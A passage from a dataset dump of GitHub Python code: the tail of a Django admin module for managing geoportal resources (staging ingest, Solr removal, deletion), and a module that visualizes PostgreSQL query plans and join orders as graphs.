Resource.objects.filter(status_type=r.status_type,parent=r.id)\n print(\"The layers are:\",r.layers)\n\n exporter = db_to_gbl.DB_ToGBL({\n \"resources\": queryset,\n \"path\": directory + \"/\",\n \"verbosity\": verbosity\n })\n # then ingest\n publish_to_gbl.Publish_ToGBL({\n \"path\": directory + \"/json\",\n \"verbosity\": verbosity\n })\n # set status to remove from staging\n updated =queryset.update(status_type='is')\n self.message_user(request, ngettext(\n '%d resource was successfully ingested to Staging.',\n '%d resources were successfully ingested to Staging.',\n updated,\n ) % updated, messages.SUCCESS)\n\n add_selected_resources_to_staging.short_description = \"Ingest to Staging\"\n\n def remove_selected_resources_from_index_staging(self, request, queryset):\n deleter = Delete_From_Solr.Delete_From_Solr({})\n # set status to remove from staging\n updated =queryset.update(status_type='rs')\n for obj in queryset:\n # remove from solr\n print(\"DELETE---\", obj.resource_id+\"-\"+str(obj.end_point.id))\n deleter.interface.delete_one_record(\"\\\"\"+obj.resource_id+\"-\"+str(obj.end_point.id)+\"\\\"\")\n\n self.message_user(request, ngettext(\n '%d resource was successfully removed from Staging.',\n '%d resources were successfully removed from Staging.',\n updated,\n ) % updated, messages.SUCCESS)\n\n remove_selected_resources_from_index_staging.short_description = \"Remove from Staging\"\n\n def delete_selected_resources(self, request, queryset):\n\n if 'apply' in request.POST:\n # The user clicked submit on the intermediate form.\n # Perform our update action:\n # # prevent postgres from hanging - https://stackoverflow.com/questions/62439261/postgres-delete-hangs-on-a-table-with-a-self-referential-foreign-key\n with connection.cursor() as cursor:\n cursor.execute(\"ALTER TABLE resources_resource DISABLE TRIGGER ALL;\")\n\n for obj in queryset:\n print(\"WERE DELETING SOMETHING #############\")\n obj.delete()\n\n with connection.cursor() as cursor:\n cursor.execute(\"ALTER TABLE resources_resource ENABLE TRIGGER ALL;\")\n # Redirect to our admin view after our update has\n # completed with a nice little info message saying\n # our models have been updated:\n self.message_user(request,\n \" {} Resources Deleted!\".format(queryset.count()))\n return HttpResponseRedirect(request.get_full_path())\n\n return render(request,\n 'admin/delete.html',\n context={'resources':queryset})\n\n def save_model(self, request, obj, form, change):\n\n try:\n # attempt to match precision and prevent unexpected change\n # use first point as determinant\n #todo make this more robust\n first_point = str(self.model.objects.get(id=obj.id).bounding_box[0][0][0])\n precision = len(first_point[first_point.index(\".\") + 1:])\n wkt_w = WKTWriter()\n wkt_w.precision = precision\n obj.bounding_box = GEOSGeometry(wkt_w.write(obj.bounding_box))\n except:\n pass\n print(\"first point\",)\n \"\"\"pass request to save to distinguish between automation and admin\n \"\"\"\n try:\n obj.save(request.user)\n except:\n pass\n\n def preview(self, obj):\n if obj.pk:\n\n html = \"Preview\"\n return mark_safe(html)\n else:\n return '-'\n\n preview.short_description = (\"Preview\")\n preview.allow_tags = True\n\n\n\ndef get_pretty_json(_json):\n \"\"\"Function to display pretty version of our data REF: https://www.pydanny.com/pretty-formatting-json-django-admin.html\"\"\"\n # Convert the data to sorted, indented JSON\n response = json.dumps(_json, sort_keys=True, indent=2)\n\n # Get the Pygments formatter\n formatter = 
HtmlFormatter(style='colorful')\n # Highlight the data\n response = highlight(response, JsonLexer(), formatter)\n\n # Get the stylesheet\n return \"\" + response+\"\"\n\n\nadmin_site.register(Resource, ResourceAdmin)\n\nclass End_PointAdmin(OSMGeoAdmin):\n pass\n\nadmin_site.register(End_Point, End_PointAdmin)\n\nclass PublisherAdmin(OSMGeoAdmin):\n search_fields = ('name',)\n pass\nadmin_site.register(Publisher, PublisherAdmin)\n\nclass Community_InputAdmin(OSMGeoAdmin):\n list_display = [\"resource\",\"date\",\"name\", \"email\"]\n raw_id_fields = (\"resource\",)\nadmin_site.register(Community_Input, Community_InputAdmin)\n\nclass Georeference_RequestAdmin(OSMGeoAdmin):\n pass\nadmin_site.register(Georeference_Request, Georeference_RequestAdmin)\n\n\nclass OwnerAdmin(OSMGeoAdmin):\n # enable a full_name overwrite when available\n list_display=[\"name\",\"full_name\"]\n search_fields = (\"name\",\"full_name\")\n\nadmin_site.register(Owner, OwnerAdmin)\n\nclass TypeAdmin(OSMGeoAdmin):\n pass\nadmin_site.register(Type, TypeAdmin)\n\nclass Geometry_TypeAdmin(OSMGeoAdmin):\n pass\nadmin_site.register(Geometry_Type, Geometry_TypeAdmin)\n\nclass FormatAdmin(OSMGeoAdmin):\n pass\nadmin_site.register(Format, FormatAdmin)\n\n\nclass Category_KeywordsInline(admin.StackedInline):\n model = Category_Keywords.category.through\n extra = 0\n\nclass Category_KeywordsAdmin(OSMGeoAdmin):\n search_fields = ('name',)\nadmin_site.register(Category_Keywords, Category_KeywordsAdmin)\n\nclass CategoryAdmin(OSMGeoAdmin):\n inlines = [\n Category_KeywordsInline\n ]\nadmin_site.register(Category, CategoryAdmin)\n\n\nclass TagAdmin(OSMGeoAdmin):\n search_fields = ('name',)\nadmin_site.register(Tag, TagAdmin)\n\nclass PlaceAdmin(OSMGeoAdmin):\n search_fields = ('name',)\nadmin_site.register(Place, PlaceAdmin)\n\nclass Named_PlaceAdmin(OSMGeoAdmin):\n search_fields = ('name',)\nadmin_site.register(Named_Place, Named_PlaceAdmin)\n\nclass URL_TypeAdmin(OSMGeoAdmin):\n list_display = ('name', 'ref', 'service', '_class', '_method')\n\nadmin_site.register(URL_Type,URL_TypeAdmin)\n\nclass URLAdmin(OSMGeoAdmin):\n list_filter = (\"url_type\",)\n\nadmin_site.register(URL,URLAdmin)\n\n", "repo_name": "GeospatialCentroid/geoportal-manager", "sub_path": "resources/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 15060, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.setrecursionlimit", "line_number": 33, "usage_type": "call"}, {"api_name": "django.contrib.admin.AdminSite", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 39, "usage_type": "name"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 47, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 47, "usage_type": "name"}, {"api_name": "models.URL", "line_number": 48, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 64, "usage_type": "call"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 82, "usage_type": "call"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 90, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 90, "usage_type": "name"}, {"api_name": "models.Status_Log", "line_number": 91, "usage_type": "name"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 94, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 94, 
"usage_type": "name"}, {"api_name": "models.Change_Log", "line_number": 95, "usage_type": "name"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 107, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 107, "usage_type": "name"}, {"api_name": "models.Resource.parent", "line_number": 108, "usage_type": "attribute"}, {"api_name": "models.Resource", "line_number": 108, "usage_type": "name"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 116, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 116, "usage_type": "name"}, {"api_name": "models.Resource.parent", "line_number": 117, "usage_type": "attribute"}, {"api_name": "models.Resource", "line_number": 117, "usage_type": "name"}, {"api_name": "django.contrib.admin.SimpleListFilter", "line_number": 125, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 125, "usage_type": "name"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 144, "usage_type": "name"}, {"api_name": "django.db.connection.cursor", "line_number": 178, "usage_type": "call"}, {"api_name": "django.db.connection", "line_number": 178, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 197, "usage_type": "call"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 202, "usage_type": "call"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 205, "usage_type": "call"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 208, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 232, "usage_type": "call"}, {"api_name": "os.path", "line_number": 232, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 233, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 238, "usage_type": "call"}, {"api_name": "models.Resource.objects.filter", "line_number": 243, "usage_type": "call"}, {"api_name": "models.Resource.objects", "line_number": 243, "usage_type": "attribute"}, {"api_name": "models.Resource", "line_number": 243, "usage_type": "name"}, {"api_name": "models.Resource.objects.filter", "line_number": 249, "usage_type": "call"}, {"api_name": "models.Resource.objects", "line_number": 249, "usage_type": "attribute"}, {"api_name": "models.Resource", "line_number": 249, "usage_type": "name"}, {"api_name": "resources.ingester.DB_ToGBL.DB_ToGBL", "line_number": 252, "usage_type": "call"}, {"api_name": "resources.ingester.DB_ToGBL", "line_number": 252, "usage_type": "name"}, {"api_name": "resources.ingester.Publish_ToGBL.Publish_ToGBL", "line_number": 258, "usage_type": "call"}, {"api_name": "resources.ingester.Publish_ToGBL", "line_number": 258, "usage_type": "name"}, {"api_name": "django.utils.translation.ngettext", "line_number": 264, "usage_type": "call"}, {"api_name": "django.contrib.messages.SUCCESS", "line_number": 268, "usage_type": "attribute"}, {"api_name": "django.contrib.messages", "line_number": 268, "usage_type": "name"}, {"api_name": "resources.ingester.Delete_From_Solr.Delete_From_Solr", "line_number": 273, "usage_type": "call"}, {"api_name": "resources.ingester.Delete_From_Solr", "line_number": 273, "usage_type": "name"}, {"api_name": "django.utils.translation.ngettext", "line_number": 281, "usage_type": 
"call"}, {"api_name": "django.contrib.messages.SUCCESS", "line_number": 285, "usage_type": "attribute"}, {"api_name": "django.contrib.messages", "line_number": 285, "usage_type": "name"}, {"api_name": "django.db.connection.cursor", "line_number": 295, "usage_type": "call"}, {"api_name": "django.db.connection", "line_number": 295, "usage_type": "name"}, {"api_name": "django.db.connection.cursor", "line_number": 302, "usage_type": "call"}, {"api_name": "django.db.connection", "line_number": 302, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 309, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 311, "usage_type": "call"}, {"api_name": "django.contrib.gis.geos.WKTWriter", "line_number": 323, "usage_type": "call"}, {"api_name": "django.contrib.gis.geos.GEOSGeometry", "line_number": 325, "usage_type": "call"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 340, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 352, "usage_type": "call"}, {"api_name": "pygments.formatters.HtmlFormatter", "line_number": 355, "usage_type": "call"}, {"api_name": "pygments.highlight", "line_number": 357, "usage_type": "call"}, {"api_name": "pygments.lexers.JsonLexer", "line_number": 357, "usage_type": "call"}, {"api_name": "models.Resource", "line_number": 363, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 365, "usage_type": "name"}, {"api_name": "models.End_Point", "line_number": 368, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 370, "usage_type": "name"}, {"api_name": "models.Publisher", "line_number": 373, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 375, "usage_type": "name"}, {"api_name": "models.Community_Input", "line_number": 378, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 380, "usage_type": "name"}, {"api_name": "models.Georeference_Request", "line_number": 382, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 385, "usage_type": "name"}, {"api_name": "models.Owner", "line_number": 390, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 392, "usage_type": "name"}, {"api_name": "models.Type", "line_number": 394, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 396, "usage_type": "name"}, {"api_name": "models.Geometry_Type", "line_number": 398, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 400, "usage_type": "name"}, {"api_name": "models.Format", "line_number": 402, "usage_type": "argument"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 405, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 405, "usage_type": "name"}, {"api_name": "models.Category_Keywords.category", "line_number": 406, "usage_type": "attribute"}, {"api_name": "models.Category_Keywords", "line_number": 406, "usage_type": "name"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 409, "usage_type": "name"}, {"api_name": "models.Category_Keywords", "line_number": 411, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 413, "usage_type": "name"}, {"api_name": "models.Category", "line_number": 417, "usage_type": "argument"}, {"api_name": 
"django.contrib.gis.admin.OSMGeoAdmin", "line_number": 420, "usage_type": "name"}, {"api_name": "models.Tag", "line_number": 422, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 424, "usage_type": "name"}, {"api_name": "models.Place", "line_number": 426, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 428, "usage_type": "name"}, {"api_name": "models.Named_Place", "line_number": 430, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 432, "usage_type": "name"}, {"api_name": "models.URL_Type", "line_number": 435, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 437, "usage_type": "name"}, {"api_name": "models.URL", "line_number": 440, "usage_type": "argument"}]} +{"seq_id": "42268205687", "text": "import numpy as np\nimport json\nimport pdb\nimport networkx as nx\nimport time\nimport matplotlib\n\nimport networkx as nx\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\n\nimport grandalf\nfrom grandalf.layouts import SugiyamaLayout\n\nfrom .utils import SOURCE_NODE\nfrom evaluation.cost_model import update_subplan_costs\n\nCROSS_JOIN_CARD = 19329323\n\ndef _find_all_tables(plan):\n '''\n '''\n # find all the scan nodes under the current level, and return those\n table_names = extract_values(plan, \"Relation Name\")\n alias_names = extract_values(plan, \"Alias\")\n table_names.sort()\n alias_names.sort()\n\n return table_names, alias_names\n\ndef explain_to_nx(explain):\n '''\n '''\n base_table_nodes = []\n join_nodes = []\n\n def _get_node_name(tables):\n name = \"\"\n if len(tables) > 1:\n name = str(deterministic_hash(str(tables)))[0:5]\n join_nodes.append(name)\n else:\n name = tables[0]\n if len(name) >= 6:\n # no aliases, shorten it\n name = \"\".join([n[0] for n in name.split(\"_\")])\n if name in base_table_nodes:\n name = name + \"2\"\n base_table_nodes.append(name)\n return name\n\n def _add_node_stats(node, plan):\n # add stats for the join\n G.nodes[node][\"Plan Rows\"] = plan[\"Plan Rows\"]\n if \"Actual Rows\" in plan:\n G.nodes[node][\"Actual Rows\"] = plan[\"Actual Rows\"]\n else:\n G.nodes[node][\"Actual Rows\"] = -1.0\n\n if \"Node Type\" in plan:\n G.nodes[node][\"Node Type\"] = plan[\"Node Type\"]\n total_cost = plan[\"Total Cost\"]\n G.nodes[node][\"Total Cost\"] = total_cost\n aliases = G.nodes[node][\"aliases\"]\n if len(G.nodes[node][\"tables\"]) > 1:\n children_cost = plan[\"Plans\"][0][\"Total Cost\"] \\\n + plan[\"Plans\"][1][\"Total Cost\"]\n\n # +1 to avoid cases which are very close\n # if not total_cost+1 >= children_cost:\n # print(\"aliases: {} children cost: {}, total cost: {}\".format(\\\n # aliases, children_cost, total_cost))\n # pdb.set_trace()\n G.nodes[node][\"cur_cost\"] = total_cost - children_cost\n G.nodes[node][\"node_label\"] = plan[\"Node Type\"][0]\n G.nodes[node][\"scan_type\"] = \"\"\n else:\n # FIXME: debug\n G.nodes[node][\"cur_cost\"] = total_cost\n G.nodes[node][\"node_label\"] = node\n # what type of scan was this?\n node_types = extract_values(plan, \"Node Type\")\n for i, full_n in enumerate(node_types):\n shortn = \"\"\n for n in full_n.split(\" \"):\n shortn += n[0]\n node_types[i] = shortn\n\n scan_type = \"\\n\".join(node_types)\n G.nodes[node][\"scan_type\"] = scan_type\n\n def traverse(obj):\n if isinstance(obj, dict):\n if \"Plans\" in obj:\n if len(obj[\"Plans\"]) == 
2:\n                    # these are all the joins\n                    left_tables, left_aliases = _find_all_tables(obj[\"Plans\"][0])\n                    right_tables, right_aliases = _find_all_tables(obj[\"Plans\"][1])\n                    if len(left_tables) == 0 or len(right_tables) == 0:\n                        return\n                    all_tables = left_tables + right_tables\n                    all_aliases = left_aliases + right_aliases\n                    all_aliases.sort()\n                    all_tables.sort()\n\n                    if len(left_aliases) > 0:\n                        node0 = _get_node_name(left_aliases)\n                        node1 = _get_node_name(right_aliases)\n                        node_new = _get_node_name(all_aliases)\n                    else:\n                        node0 = _get_node_name(left_tables)\n                        node1 = _get_node_name(right_tables)\n                        node_new = _get_node_name(all_tables)\n\n                    # update graph\n                    G.add_edge(node_new, node0)\n                    G.add_edge(node_new, node1)\n                    G.edges[(node_new, node0)][\"join_direction\"] = \"left\"\n                    G.edges[(node_new, node1)][\"join_direction\"] = \"right\"\n\n                    # add other parameters on the nodes\n                    G.nodes[node0][\"tables\"] = left_tables\n                    G.nodes[node1][\"tables\"] = right_tables\n                    G.nodes[node0][\"aliases\"] = left_aliases\n                    G.nodes[node1][\"aliases\"] = right_aliases\n                    G.nodes[node_new][\"tables\"] = all_tables\n                    G.nodes[node_new][\"aliases\"] = all_aliases\n\n                    # TODO: if either the left, or right were a scan, then add\n                    # scan stats\n                    _add_node_stats(node_new, obj)\n\n                    if len(left_tables) == 1:\n                        _add_node_stats(node0, obj[\"Plans\"][0])\n                    if len(right_tables) == 1:\n                        _add_node_stats(node1, obj[\"Plans\"][1])\n\n            for k, v in obj.items():\n                if isinstance(v, (dict, list)):\n                    traverse(v)\n\n        elif isinstance(obj, list) or isinstance(obj,tuple):\n            for item in obj:\n                traverse(item)\n\n    G = nx.DiGraph()\n    traverse(explain)\n    G.base_table_nodes = base_table_nodes\n    G.join_nodes = join_nodes\n    return G\n\nNODE_COLORS = {}\n# NODE_COLORS[\"Hash Join\"] = 'b'\n# NODE_COLORS[\"Merge Join\"] = 'r'\n# NODE_COLORS[\"Nested Loop\"] = 'c'\n\nNODE_COLORS[\"Index Scan\"] = 'k'\nNODE_COLORS[\"Seq Scan\"] = 'k'\nNODE_COLORS[\"Bitmap Heap Scan\"] = 'k'\n\nNODE_COLORS[\"Hash\"] = 'k'\nNODE_COLORS[\"Materialize\"] = 'k'\nNODE_COLORS[\"Sort\"] = 'k'\n\n# for signifying whether the join was a left join or right join\nEDGE_COLORS = {}\nEDGE_COLORS[\"left\"] = \"k\"\nEDGE_COLORS[\"right\"] = \"k\"\n\ndef _plot_join_order_graph(G, base_table_nodes, join_nodes, pdf, title,\n        fn):\n\n    def format_ints(num):\n        # returns the number formatted to closest 1000 + K\n        return str(round(num, -3)).replace(\"000\",\"\") + \"K\"\n\n    def _plot_labels(xdiff, ydiff, key, font_color, font_size):\n        labels = {}\n        label_pos = {}\n        for k, v in pos.items():\n            label_pos[k] = (v[0]+xdiff, v[1]+ydiff)\n            if key in G.nodes[k]:\n                if is_float(G.nodes[k][key]):\n                    labels[k] = format_ints(G.nodes[k][key])\n                else:\n                    labels[k] = G.nodes[k][key]\n            else:\n                labels[k] = -1\n\n        nx.draw_networkx_labels(G, label_pos, labels,\n                font_size=font_size, font_color=font_color, ax=ax)\n\n    fig,ax = plt.subplots(figsize=(8,7))\n    NODE_SIZE = 600\n\n    # graphviz proved troublesome here\n    # pos = graphviz_layout(G, prog='dot')\n    # pos = graphviz_layout(G, prog='dot',\n            # args='-Gnodesep=0.05')\n\n    # graphviz is better, but it is a pain to install, so grandalf is also ok otherwise\n    # G = G.reverse(copy=True)\n\n    g = grandalf.utils.convert_nextworkx_graph_to_grandalf(G) # undocumented function\n    class defaultview(object):\n        w, h = 10, 10\n    for v in g.V(): v.view = defaultview()\n    sug = SugiyamaLayout(g.C[0])\n    sug.init_all() # roots=[V[0]])\n    # sug.init_all(roots=[g.V[0]],inverted_edges=[g.V[4].e_to(g.V[0])])\n    # This is a bit of a misnomer, as grandalf doesn't actually come with any\n    # visualization methods. 
This method instead calculates positions\n sug.draw() # Extracts the positions\n pos = {v.data: (v.view.xy[0], v.view.xy[1]) for v in g.C[0].sV}\n\n # ugly hacks; want to draw the graph upside down than what grandalf gives\n # us (graphviz actually gave the correct layout...)\n ys = []\n levels = {}\n leveltoy = {}\n newlevels = {}\n for k,v in pos.items():\n ys.append(v[1])\n ys.sort()\n ys = np.unique(ys)\n level = 0\n for y in ys:\n levels[y] = level\n leveltoy[level] = y\n newlevels[y] = len(ys)-1-level\n level += 1\n pos2 = {}\n for k,v in pos.items():\n lv = newlevels[v[1]]\n newy = leveltoy[lv]\n pos2[k] = (v[0], newy)\n\n pos = pos2\n\n plt.title(title)\n color_intensity = [G.nodes[n][\"cur_cost\"] for n in G.nodes()]\n vmin = min(color_intensity)\n vmax = max(color_intensity)\n # cmap = 'viridis_r'\n cmap = matplotlib.colors.LinearSegmentedColormap.from_list(\"\", [\"green\",\"yellow\",\"red\"])\n\n nx.draw_networkx_nodes(G, pos,\n node_size=NODE_SIZE,\n node_color = color_intensity,\n cmap = cmap,\n alpha=0.2,\n vmin=vmin, vmax=vmax,\n ax=ax)\n\n sm = plt.cm.ScalarMappable(cmap=cmap, norm=plt.Normalize(vmin = vmin,\n vmax=vmax))\n\n sm._A = []\n plt.colorbar(sm, alpha=0.2, fraction=0.1, pad=0.0,\n label=\"PostgreSQL Estimated Cost\")\n\n _plot_labels(0, -10, \"est_card\", \"b\", 8)\n _plot_labels(0, +10, \"true_card\", \"darkorange\", 8)\n _plot_labels(0, 0, \"node_label\", \"k\", 14)\n\n patch1 = mpatches.Patch(color='b', label='Estimated Cardinality')\n patch2 = mpatches.Patch(color='darkorange', label='True Cardinality')\n plt.legend(handles=[patch1,patch2])\n\n # TODO: shape of node based on scan types\n # _plot_labels(+25, +5, \"scan_type\", \"b\", 10)\n\n x_values, y_values = zip(*pos.values())\n x_max = max(x_values)\n x_min = min(x_values)\n x_margin = (x_max - x_min) * 0.10\n plt.xlim(x_min - x_margin, x_max + x_margin)\n\n edge_colors = []\n for edge in G.edges():\n edge_colors.append(EDGE_COLORS[G.edges[edge][\"join_direction\"]])\n\n nx.draw_networkx_edges(G, pos, width=1.0,\n alpha=1.0, arrows=False,\n edge_color=edge_colors, ax=ax)\n plt.tight_layout()\n\n if pdf is not None:\n pdf.savefig()\n elif fn is not None:\n plt.savefig(fn)\n else:\n plt.show()\n\n plt.close()\n\ndef plot_explain_join_order(explain, true_cardinalities,\n est_cardinalities, pdf, title, fn=None):\n '''\n @true_cardinalities: dict for this particular explain\n '''\n G = explain_to_nx(explain)\n for node in G.nodes():\n aliases = G.nodes[node][\"aliases\"]\n aliases.sort()\n card_key = \" \".join(aliases)\n if true_cardinalities is None:\n G.nodes[node][\"est_card\"] = G.nodes[node][\"Plan Rows\"]\n G.nodes[node][\"true_card\"] = G.nodes[node][\"Actual Rows\"]\n elif card_key in true_cardinalities:\n G.nodes[node][\"est_card\"] = est_cardinalities[card_key]\n G.nodes[node][\"true_card\"] = true_cardinalities[card_key]\n elif tuple(aliases) in true_cardinalities:\n G.nodes[node][\"est_card\"] = est_cardinalities[tuple(aliases)]\n G.nodes[node][\"true_card\"] = true_cardinalities[tuple(aliases)]\n else:\n # unknown, might be a cross-join?\n G.nodes[node][\"est_card\"] = CROSS_JOIN_CARD\n G.nodes[node][\"true_card\"] = CROSS_JOIN_CARD\n # pdb.set_trace()\n\n _plot_join_order_graph(G, G.base_table_nodes, G.join_nodes, pdf, title, fn)\n return G\n\ndef draw_plan_graph(subsetg, y, cost_model, ax=None,\n source_node=SOURCE_NODE, final_node=None, font_size=40,\n cbar_fontsize=24, cax=None, fig=None, width=None,\n edge_color=None,\n bold_opt_path=True, bold_path=None):\n\n for n in subsetg.nodes():\n 
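# note (added annotation): the node label is wrapped in $...$ below so the\n # plotting backend renders it as math, with \Join intended to appear as the\n # bowtie join operator between the relation names\n 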
joined = \" \\Join \".join(n)\n joined = \"$\" + joined + \"$\"\n subsetg.nodes()[n][\"label\"] = joined\n\n if y is not None and cost_model is not None:\n cost_key = \"tmp_cost\"\n subsetg = subsetg.reverse()\n tcost = update_subplan_costs(subsetg, cost_model,\n cost_key=cost_key, ests=y)\n\n # TODO: need to add the flow-loss computing module\n # flows, edges = get_flows(subsetg, cost_model+cost_key)\n # Flow-Loss specific widths\n # MIN: 2...6\n # MIN_WIDTH = 1.0\n # MAX_WIDTH = 30.0\n # NEW_RANGE = MAX_WIDTH - MIN_WIDTH\n # OLD_RANGE = max(flows) - min(flows)\n\n # edge_widths = {}\n # for i, x in enumerate(flows):\n # normx = (((x - min(flows))*NEW_RANGE) / OLD_RANGE) + MIN_WIDTH\n # edge_widths[edges[i]] = normx\n # widths = []\n # for edge in subsetg.edges():\n # key = tuple([edge[1], edge[0]])\n # widths.append(edge_widths[key])\n\n # reverse back\n subsetg = subsetg.reverse()\n widths = []\n for edge in subsetg.edges():\n key = tuple([edge[1], edge[0]])\n widths.append(1.0)\n\n edge_colors = []\n for edge in subsetg.edges(data=True):\n edge_colors.append(edge[2][cost_model+cost_key])\n\n vmin = min(edge_colors)\n vmax = max(edge_colors)\n\n # assert len(edge_colors) == len(flows)\n opt_labels_list = nx.shortest_path(subsetg, source_node,\n final_node, weight=cost_model+cost_key)\n opt_labels = {}\n for n in subsetg.nodes(data=True):\n if n[0] in opt_labels_list:\n opt_labels[n[0]] = n[1][\"label\"]\n\n cm = matplotlib.colors.LinearSegmentedColormap.from_list(\"\", [\"green\", \"yellow\", \"red\"])\n\n else:\n widths = []\n for edge in subsetg.edges():\n key = tuple([edge[1], edge[0]])\n widths.append(2.0)\n cm = None\n\n pos = nx.nx_pydot.pydot_layout(subsetg, prog=\"dot\")\n\n if ax is None:\n fig, ax = plt.subplots(1,1,figsize=(30,20))\n\n labels = nx.get_node_attributes(subsetg, 'label')\n\n nx.draw_networkx_labels(subsetg, pos=pos,\n labels=labels,\n ax=ax, font_size=font_size,\n bbox=dict(facecolor=\"w\", edgecolor='k', boxstyle='round,pad=0.1'))\n\n if bold_opt_path and cost_model is not None:\n nx.draw_networkx_labels(subsetg, pos=pos,\n labels=opt_labels, ax=ax,\n font_size=font_size,\n bbox=dict(facecolor=\"w\", edgecolor='k',\n lw=font_size/2, boxstyle='round,pad=0.5', fill=True))\n\n if bold_path and cost_model is not None:\n bold_labels = {}\n for n in subsetg.nodes(data=True):\n if n[0] in bold_path:\n bold_labels[n[0]] = n[1][\"label\"]\n nx.draw_networkx_labels(subsetg, pos=pos,\n labels=bold_labels, ax=ax,\n font_size=font_size,\n bbox=dict(facecolor=\"w\", edgecolor='k',\n lw=font_size/2, boxstyle='round,pad=0.5', fill=True))\n\n if edge_color is not None:\n edge_colors = edge_color\n\n edges = nx.draw_networkx_edges(subsetg, pos,\n edge_color=edge_colors,\n width=widths, ax = ax, edge_cmap=cm,\n arrows=True,\n arrowsize=font_size / 2,\n arrowstyle='simple',\n min_target_margin=5.0)\n\n if y is not None and cost_model is not None:\n plt.style.use(\"seaborn-white\")\n sm = plt.cm.ScalarMappable(cmap=cm,\n norm=plt.Normalize(vmin=vmin, vmax=vmax))\n sm.set_array([])\n if fig is None:\n cbar = plt.colorbar(sm, aspect=50,\n orientation=\"horizontal\", pad =\n 0.02)\n else:\n cbar = fig.colorbar(sm, ax=ax,\n pad = 0.02,\n aspect=50,\n orientation=\"horizontal\")\n\n cbar.ax.tick_params(labelsize=font_size)\n cbar.set_label(\"Cost\", fontsize=font_size)\n cbar.ax.xaxis.get_offset_text().set_fontsize(font_size)\n\n plt.tight_layout()\n", "repo_name": "learnedsystems/CEB", "sub_path": "query_representation/viz.py", "file_name": "viz.py", "file_ext": "py", 
"file_size_in_byte": 15652, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 51, "dataset": "github-code", "pt": "61", "api": [{"api_name": "networkx.DiGraph", "line_number": 148, "usage_type": "call"}, {"api_name": "networkx.draw_networkx_labels", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "grandalf.utils.convert_nextworkx_graph_to_grandalf", "line_number": 206, "usage_type": "call"}, {"api_name": "grandalf.utils", "line_number": 206, "usage_type": "attribute"}, {"api_name": "grandalf.layouts.SugiyamaLayout", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 242, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 242, "usage_type": "name"}, {"api_name": "matplotlib.colors.LinearSegmentedColormap.from_list", "line_number": 247, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 247, "usage_type": "attribute"}, {"api_name": "networkx.draw_networkx_nodes", "line_number": 249, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm.ScalarMappable", "line_number": 257, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 257, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 257, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Normalize", "line_number": 257, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", 